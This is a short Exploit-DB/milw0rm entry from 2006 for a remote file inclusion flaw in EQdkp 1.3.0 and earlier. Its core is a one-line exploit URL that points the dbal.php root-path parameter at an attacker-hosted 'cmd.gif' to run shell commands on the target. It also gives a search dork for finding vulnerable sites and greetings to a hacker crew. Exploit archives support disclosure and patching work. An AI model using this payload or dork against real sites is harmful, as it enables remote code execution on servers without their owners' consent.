EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion

EDB-ID:

1764


Author:

OLiBekaS

Type:

webapps


Platform:

PHP

Date:

2006-05-07


Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]